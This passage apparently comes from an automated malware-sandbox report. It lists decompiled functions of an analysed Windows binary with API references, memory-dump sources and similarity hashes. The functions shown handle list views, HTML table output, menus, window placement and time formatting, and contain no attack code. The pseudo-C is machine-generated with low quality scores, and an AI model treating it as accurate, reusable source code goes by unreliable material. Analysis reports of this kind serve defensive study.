                                                                                                                                                0x0040793f
                                                                                                                                                0x00407945
                                                                                                                                                0x0040794b
                                                                                                                                                0x0040794e
                                                                                                                                                0x00407951
                                                                                                                                                0x00407959
                                                                                                                                                0x00407962
                                                                                                                                                0x00407969
                                                                                                                                                0x00407973
                                                                                                                                                0x0040797e
                                                                                                                                                0x00407985
                                                                                                                                                0x0040798d
                                                                                                                                                0x00407990
                                                                                                                                                0x00407994
                                                                                                                                                0x004079ad
                                                                                                                                                0x004079b1
                                                                                                                                                0x004079b9
                                                                                                                                                0x004079bc
                                                                                                                                                0x004079bc
                                                                                                                                                0x004079c0
                                                                                                                                                0x004079c3
                                                                                                                                                0x004079c9
                                                                                                                                                0x004079c9
                                                                                                                                                0x004079d1
                                                                                                                                                0x004079d7
                                                                                                                                                0x004079da
                                                                                                                                                0x004079df
                                                                                                                                                0x004079e0
                                                                                                                                                0x004079e3
                                                                                                                                                0x004079e8
                                                                                                                                                0x004079f3
                                                                                                                                                0x004079f4
                                                                                                                                                0x004079f9
                                                                                                                                                0x004079fb
                                                                                                                                                0x004079fe
                                                                                                                                                0x00407a03
                                                                                                                                                0x00407a09
                                                                                                                                                0x00407a18
                                                                                                                                                0x00407a18
                                                                                                                                                0x00407a0b
                                                                                                                                                0x00407a11
                                                                                                                                                0x00407a11
                                                                                                                                                0x00407a1a
                                                                                                                                                0x00407a25
                                                                                                                                                0x00407a28
                                                                                                                                                0x00407a2b
                                                                                                                                                0x00407a31
                                                                                                                                                0x00407a37
                                                                                                                                                0x00407a3d
                                                                                                                                                0x00407a43
                                                                                                                                                0x00407a49
                                                                                                                                                0x00407a53
                                                                                                                                                0x00407a63

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 0040769A
                                                                                                                                                  • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076A8
                                                                                                                                                  • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076B9
                                                                                                                                                  • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D0
                                                                                                                                                  • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D9
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00407923
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040793F
                                                                                                                                                • memcpy.MSVCRT ref: 00407962
                                                                                                                                                • memcpy.MSVCRT ref: 00407973
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004079F4
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004079FE
                                                                                                                                                  • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
                                                                                                                                                  • Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
                                                                                                                                                  • Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F
                                                                                                                                                  • Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
                                                                                                                                                  • Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
                                                                                                                                                  • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                • String ID: x"A
                                                                                                                                                • API String ID: 975042529-63625180
                                                                                                                                                • Opcode ID: 5e15de00d9b0122d9a525f1b9c652474aa833521780f625cb65b569559e88023
                                                                                                                                                • Instruction ID: 8801afb4ace5fbedb5bd820c2c75847393e8be4378505899df7aece04ba2f2e1
                                                                                                                                                • Opcode Fuzzy Hash: 5e15de00d9b0122d9a525f1b9c652474aa833521780f625cb65b569559e88023
                                                                                                                                                • Instruction Fuzzy Hash: 79418DB2A01712AFD718DF3AD485B99BBA4BF04314F10422FE609DB2C1D775B8208B98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004031BE, Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 49%
                                                                                                                                                			E004031BE(intOrPtr _a4) {
				struct HWND__* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				short _v28;
				intOrPtr _v56;
				char* _v60;
				void* _v72;
				void _v582;
				char _v584;
				struct HWND__* _t52;
				intOrPtr* _t58;
				void* _t59;
				intOrPtr _t63;
				void* _t71;
				intOrPtr _t77;
				void* _t78;
				intOrPtr _t79;
				void* _t82;
				intOrPtr _t87;
				signed int _t89;
				short* _t90;
				void* _t92;
				void* _t93;

				_t87 = _a4;
				_t52 = GetDlgItem( *(_t87 + 0x10), 0x3e9);
				_v8 = _t52;
				SendMessageW(_t52, 0x1009, 0, 0);
				SendMessageW(_v8, 0x1036, 0, 0x26);
				do {
				} while (SendMessageW(_v8, 0x101c, 0, 0) != 0);
				_push(0xc8);
				_push(0);
				_push(0);
				_push(_v8);
				_t78 = 6;
				E00402842(0x40f454, _t78);
				_t58 =  *((intOrPtr*)(_t87 + 0x40));
				_t79 =  *((intOrPtr*)(_t58 + 4));
				_t77 =  *_t58;
				_t93 = _t92 + 0x10;
				_v24 = _t79;
				_v16 = 0;
				if(_t79 <= 0) {
					L10:
					_t59 = 2;
					E004027D3(_t59, _v8, 0, _t59);
					return SetFocus(_v8);
				} else {
					goto L3;
				}
				do {
					L3:
					_v12 = 0;
					_v20 = 0;
					do {
						_t89 = _v12 << 2;
						if( *((short*)(_t77 + _t89 + 2)) == _v16) {
							_v584 = 0;
							memset( &_v582, 0, 0x1fe);
							_t93 = _t93 + 0xc;
							_v60 =  &_v584;
							_v72 = 4;
							_v56 = 0xff;
							if(SendMessageW( *( *((intOrPtr*)(_a4 + 0x40)) + 8), 0x105f, _v12,  &_v72) != 0) {
								_push(0);
								_push(_v12);
								_push(0);
								_push(0);
								_push(0);
								_push(_v8);
								_t82 = 5;
								_t71 = E004028C5( &_v584, _t82);
								_t90 = _t89 + _t77;
								_t83 =  *_t90;
								_v28 =  *_t90;
								E00402CD0(_v8, _t71, 0 | _t83 > 0x00000000);
								_t93 = _t93 + 0x24;
								if(_v28 == 0) {
									 *_t90 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x44)) + _v20 + 0xc));
								}
							}
						}
						_v12 = _v12 + 1;
						_t63 = _v24;
						_v20 = _v20 + 0x14;
					} while (_v12 < _t63);
					_v16 = _v16 + 1;
				} while (_v16 < _t63);
				goto L10;
			}




























                                                                                                                                                0x004031ca
                                                                                                                                                0x004031d5
                                                                                                                                                0x004031eb
                                                                                                                                                0x004031ee
                                                                                                                                                0x004031fb
                                                                                                                                                0x004031fd
                                                                                                                                                0x00403209
                                                                                                                                                0x0040320d
                                                                                                                                                0x00403212
                                                                                                                                                0x00403213
                                                                                                                                                0x00403214
                                                                                                                                                0x0040321e
                                                                                                                                                0x0040321f
                                                                                                                                                0x00403224
                                                                                                                                                0x00403227
                                                                                                                                                0x0040322a
                                                                                                                                                0x0040322c
                                                                                                                                                0x00403231
                                                                                                                                                0x00403234
                                                                                                                                                0x00403237
                                                                                                                                                0x00403313
                                                                                                                                                0x00403315
                                                                                                                                                0x0040331b
                                                                                                                                                0x00403330
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040323d
                                                                                                                                                0x0040323d
                                                                                                                                                0x0040323d
                                                                                                                                                0x00403240
                                                                                                                                                0x00403243
                                                                                                                                                0x00403246
                                                                                                                                                0x00403251
                                                                                                                                                0x00403264
                                                                                                                                                0x0040326b
                                                                                                                                                0x00403279
                                                                                                                                                0x00403282
                                                                                                                                                0x0040328c
                                                                                                                                                0x00403299
                                                                                                                                                0x004032a8
                                                                                                                                                0x004032aa
                                                                                                                                                0x004032ab
                                                                                                                                                0x004032b4
                                                                                                                                                0x004032b5
                                                                                                                                                0x004032b6
                                                                                                                                                0x004032b7
                                                                                                                                                0x004032bc
                                                                                                                                                0x004032bd
                                                                                                                                                0x004032c2
                                                                                                                                                0x004032c4
                                                                                                                                                0x004032ce
                                                                                                                                                0x004032d6
                                                                                                                                                0x004032db
                                                                                                                                                0x004032e1
                                                                                                                                                0x004032f1
                                                                                                                                                0x004032f1
                                                                                                                                                0x004032e1
                                                                                                                                                0x004032a8
                                                                                                                                                0x004032f4
                                                                                                                                                0x004032f7
                                                                                                                                                0x004032fa
                                                                                                                                                0x004032fe
                                                                                                                                                0x00403307
                                                                                                                                                0x0040330a
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32 ref: 004031D5
                                                                                                                                                • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 004031EE
                                                                                                                                                • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 004031FB
                                                                                                                                                • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00403207
                                                                                                                                                • memset.MSVCRT ref: 0040326B
                                                                                                                                                • SendMessageW.USER32(?,0000105F,?,?), ref: 004032A0
                                                                                                                                                • SetFocus.USER32(?), ref: 00403326
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$FocusItemmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4281309102-0
                                                                                                                                                • Opcode ID: ab58b64ca0b35e7ad8e6b708a6aaa6c08aba0ce3a91fa458086e11feb534d575
                                                                                                                                                • Instruction ID: e5884d61c50a84840a295c8cd46100b63ab271327737e15352f16c4cecb35b78
                                                                                                                                                • Opcode Fuzzy Hash: ab58b64ca0b35e7ad8e6b708a6aaa6c08aba0ce3a91fa458086e11feb534d575
                                                                                                                                                • Instruction Fuzzy Hash: 46418A35900219BFDB20EF85CD89EAFBF78EF04354F1040AAF908B6291D3719A40DBA4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00408AFA, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 62%
                                                                                                                                                			E00408AFA(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t94;
				intOrPtr* _t97;
				void* _t99;
				void* _t101;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t101 = _t99 + 0x18;
				asm("movsw");
				E00408857(__ebx, 0, _a4, L"<tr>");
				_t94 = 0;
				if( *((intOrPtr*)(__ebx + 0x34)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x38)) + _t94 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x48)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t97 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t94, _t97,  &_v28);
						E0040DBA9(_v28,  &_v108);
						E0040DBDA( *((intOrPtr*)( *_t97))(_v8,  *((intOrPtr*)(_t73 + 0x68))),  *(_t73 + 0x6c));
						 *((intOrPtr*)( *_t73 + 0x54))( *(_t73 + 0x6c), _t97, _v8);
						_t67 =  *(_t73 + 0x6c);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
							_pop(0);
						}
						E0040DC79( &_v28,  *((intOrPtr*)(_t73 + 0x70)),  *(_t73 + 0x6c));
						_push( *((intOrPtr*)(_t73 + 0x70)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x68)));
						L0040DFD6();
						_t101 = _t101 + 0x1c;
						E00408857(_t73, 0, _a4,  *((intOrPtr*)(_t73 + 0x68)));
						_t94 = _t94 + 1;
					} while (_t94 <  *((intOrPtr*)(_t73 + 0x34)));
				}
				return E00408857(_t73, 0, _a4, L"\r\n");
			}























                                                                                                                                                0x00408afa
                                                                                                                                                0x00408b07
                                                                                                                                                0x00408b08
                                                                                                                                                0x00408b15
                                                                                                                                                0x00408b20
                                                                                                                                                0x00408b20
                                                                                                                                                0x00408b2c
                                                                                                                                                0x00408b2e
                                                                                                                                                0x00408b33
                                                                                                                                                0x00408b38
                                                                                                                                                0x00408b3e
                                                                                                                                                0x00408b41
                                                                                                                                                0x00408b47
                                                                                                                                                0x00408b52
                                                                                                                                                0x00408b58
                                                                                                                                                0x00408b5a
                                                                                                                                                0x00408b5a
                                                                                                                                                0x00408b5d
                                                                                                                                                0x00408b60
                                                                                                                                                0x00408b64
                                                                                                                                                0x00408b68
                                                                                                                                                0x00408b6c
                                                                                                                                                0x00408b76
                                                                                                                                                0x00408b7f
                                                                                                                                                0x00408b89
                                                                                                                                                0x00408b9f
                                                                                                                                                0x00408baf
                                                                                                                                                0x00408bb2
                                                                                                                                                0x00408bb5
                                                                                                                                                0x00408bbb
                                                                                                                                                0x00408bc9
                                                                                                                                                0x00408bcf
                                                                                                                                                0x00408bcf
                                                                                                                                                0x00408bd9
                                                                                                                                                0x00408bde
                                                                                                                                                0x00408be4
                                                                                                                                                0x00408be5
                                                                                                                                                0x00408be8
                                                                                                                                                0x00408bed
                                                                                                                                                0x00408bf0
                                                                                                                                                0x00408bf5
                                                                                                                                                0x00408c00
                                                                                                                                                0x00408c05
                                                                                                                                                0x00408c06
                                                                                                                                                0x00408b3e
                                                                                                                                                0x00408c21

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintfwcscat
                                                                                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                • API String ID: 384018552-4153097237
                                                                                                                                                • Opcode ID: aacd1c3f04bbbde4388d7715a2edef3f998899fbad5d42021ae6a7ad680bf7af
                                                                                                                                                • Instruction ID: 96aa4744b540e0de5a537674df1821739e57c2366694ca0e95279aca4d83ea93
                                                                                                                                                • Opcode Fuzzy Hash: aacd1c3f04bbbde4388d7715a2edef3f998899fbad5d42021ae6a7ad680bf7af
                                                                                                                                                • Instruction Fuzzy Hash: 10318D31900208AFDF10AF55CC85E9A7B75FF04320F1040BAF855AB2E2DB35A945DB94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00406E97, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 42%
                                                                                                                                                			E00406E97(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040E340(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E00406E97(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x412c34 =  *0x412c34 + 1;
							_t32 =  *0x412c34; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406E5E(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}











                                                                                                                                                0x00406e97
                                                                                                                                                0x00406e9a
                                                                                                                                                0x00406ea2
                                                                                                                                                0x00406ead
                                                                                                                                                0x00406eb3
                                                                                                                                                0x00406eb7
                                                                                                                                                0x00406ebb
                                                                                                                                                0x00406f81
                                                                                                                                                0x00406f87
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00406ec1
                                                                                                                                                0x00406ec1
                                                                                                                                                0x00406ecc
                                                                                                                                                0x00406ed1
                                                                                                                                                0x00406ed8
                                                                                                                                                0x00406ee7
                                                                                                                                                0x00406eef
                                                                                                                                                0x00406ef7
                                                                                                                                                0x00406eff
                                                                                                                                                0x00406f03
                                                                                                                                                0x00406f08
                                                                                                                                                0x00406f10
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00406f17
                                                                                                                                                0x00406f62
                                                                                                                                                0x00406f62
                                                                                                                                                0x00406f66
                                                                                                                                                0x00406f68
                                                                                                                                                0x00406f69
                                                                                                                                                0x00406f6d
                                                                                                                                                0x00406f70
                                                                                                                                                0x00406f75
                                                                                                                                                0x00406f75
                                                                                                                                                0x00000000
                                                                                                                                                0x00406f66
                                                                                                                                                0x00406f20
                                                                                                                                                0x00406f29
                                                                                                                                                0x00406f2b
                                                                                                                                                0x00406f2b
                                                                                                                                                0x00406f32
                                                                                                                                                0x00406f36
                                                                                                                                                0x00406f3b
                                                                                                                                                0x00406f45
                                                                                                                                                0x00406f4b
                                                                                                                                                0x00406f50
                                                                                                                                                0x00406f50
                                                                                                                                                0x00406f3d
                                                                                                                                                0x00406f3d
                                                                                                                                                0x00406f3d
                                                                                                                                                0x00406f3d
                                                                                                                                                0x00406f3b
                                                                                                                                                0x00406f5b
                                                                                                                                                0x00406f61
                                                                                                                                                0x00000000
                                                                                                                                                0x00406f78
                                                                                                                                                0x00406f78
                                                                                                                                                0x00406f79
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                • String ID: 0$6
                                                                                                                                                • API String ID: 2029023288-3849865405
                                                                                                                                                • Opcode ID: a0b7b54f04bcc436da1d99830b0d0b16883f872afdca66473e688fd6b38d6a97
                                                                                                                                                • Instruction ID: 1dbbb6522b92818e37563bbb7cb847876382a1d5db42aae0addc6953e8b82e52
                                                                                                                                                • Opcode Fuzzy Hash: a0b7b54f04bcc436da1d99830b0d0b16883f872afdca66473e688fd6b38d6a97
                                                                                                                                                • Instruction Fuzzy Hash: 9021BF31105345ABC7209F61E84599FB7B8FB84754F000A3FF645A2280E7769A24CB9A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004019D2, Relevance: 10.6, APIs: 7, Instructions: 77COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                			E004019D2(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t26;
				int _t30;
				void* _t33;
				int _t36;
				int _t37;
				int _t40;
				int _t49;

				_t33 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x208)) == 0) {
					return _t26;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t40 = GetSystemMetrics(0x4c);
					_t30 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t40 = 0;
						_t30 = 0;
					} else {
						_v8 = _v8 + _t40;
						_v12 = _v12 + _t30;
					}
					_t49 = _v20 - _v28;
					if(_t49 > 0x14) {
						_t37 = _v24;
						_t36 = _v16 - _t37;
						if(_t36 > 0x14 && _v20 > _t40 + 5) {
							_t30 = _t30 + 0xfffffff6;
							if(_t37 >= _t30) {
								_t30 = _v28;
								if(_t30 + 0x14 < _v8 && _t37 + 0x14 < _v12 &&  *((intOrPtr*)(_t33 + 0x250)) != 0) {
									_t30 = SetWindowPos( *(_t33 + 0x208), 0, _t30, _t37, _t49, _t36, 0x204);
								}
							}
						}
					}
					return _t30;
				}
			}
















                                                                                                                                                0x004019d2
                                                                                                                                                0x004019df
                                                                                                                                                0x00401a94
                                                                                                                                                0x004019e5
                                                                                                                                                0x004019f0
                                                                                                                                                0x004019f1
                                                                                                                                                0x004019f2
                                                                                                                                                0x004019f3
                                                                                                                                                0x00401a00
                                                                                                                                                0x00401a07
                                                                                                                                                0x00401a0e
                                                                                                                                                0x00401a10
                                                                                                                                                0x00401a17
                                                                                                                                                0x00401a2b
                                                                                                                                                0x00401a30
                                                                                                                                                0x00401a33
                                                                                                                                                0x00401a35
                                                                                                                                                0x00401a1e
                                                                                                                                                0x00401a1e
                                                                                                                                                0x00401a21
                                                                                                                                                0x00401a21
                                                                                                                                                0x00401a3a
                                                                                                                                                0x00401a40
                                                                                                                                                0x00401a45
                                                                                                                                                0x00401a48
                                                                                                                                                0x00401a4d
                                                                                                                                                0x00401a57
                                                                                                                                                0x00401a5c
                                                                                                                                                0x00401a5e
                                                                                                                                                0x00401a67
                                                                                                                                                0x00401a8b
                                                                                                                                                0x00401a8b
                                                                                                                                                0x00401a67
                                                                                                                                                0x00401a5c
                                                                                                                                                0x00401a4d
                                                                                                                                                0x00000000
                                                                                                                                                0x00401a92

                                                                                                                                                APIs
                                                                                                                                                • GetSystemMetrics.USER32 ref: 004019FC
                                                                                                                                                • GetSystemMetrics.USER32 ref: 00401A03
                                                                                                                                                • GetSystemMetrics.USER32 ref: 00401A0A
                                                                                                                                                • GetSystemMetrics.USER32 ref: 00401A10
                                                                                                                                                • GetSystemMetrics.USER32 ref: 00401A27
                                                                                                                                                • GetSystemMetrics.USER32 ref: 00401A2E
                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000204,?,?,?,?,?,004019CF), ref: 00401A8B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MetricsSystem$Window
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1155976603-0
                                                                                                                                                • Opcode ID: 17a53185f7517543453a4be3c81a3bbd36f75940ad8d5731b7ecdc36ba319df0
                                                                                                                                                • Instruction ID: e852b1759cb622fbc777dcf2117f8c3e284781620e86bac7d74114db1399c759
                                                                                                                                                • Opcode Fuzzy Hash: 17a53185f7517543453a4be3c81a3bbd36f75940ad8d5731b7ecdc36ba319df0
                                                                                                                                                • Instruction Fuzzy Hash: 27215C72E4221AEBDF10DFA88D496AF7B71EF40320F1141BAD904BB2D1D674A981CE94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00405C17, Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00405C17(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v24;
				long _v280;
				long _v536;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v24) == 0 || _v24 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v24, 0,  &_v280, 0x80);
						GetTimeFormatW(0x400, 0,  &_v24, 0,  &_v536, 0x80);
						wcscpy(_a4,  &_v280);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v536);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40f454);
				}
				return _a4;
			}







                                                                                                                                                0x00405c17
                                                                                                                                                0x00405c28
                                                                                                                                                0x00405c3b
                                                                                                                                                0x00000000
                                                                                                                                                0x00405c45
                                                                                                                                                0x00405c5f
                                                                                                                                                0x00405c74
                                                                                                                                                0x00405c84
                                                                                                                                                0x00405c91
                                                                                                                                                0x00405ca0
                                                                                                                                                0x00405ca5
                                                                                                                                                0x00405caa
                                                                                                                                                0x00405caa
                                                                                                                                                0x00405cb2
                                                                                                                                                0x00405cb8
                                                                                                                                                0x00405cc0

                                                                                                                                                APIs
                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00405C33
                                                                                                                                                • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080), ref: 00405C5F
                                                                                                                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080), ref: 00405C74
                                                                                                                                                • wcscpy.MSVCRT ref: 00405C84
                                                                                                                                                • wcscat.MSVCRT ref: 00405C91
                                                                                                                                                • wcscat.MSVCRT ref: 00405CA0
                                                                                                                                                • wcscpy.MSVCRT ref: 00405CB2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1331804452-0
                                                                                                                                                • Opcode ID: 2cd0e4f62e7c226bb1a7a6623729ec2332546ff41dbb1f6ce7e94b14287b325c
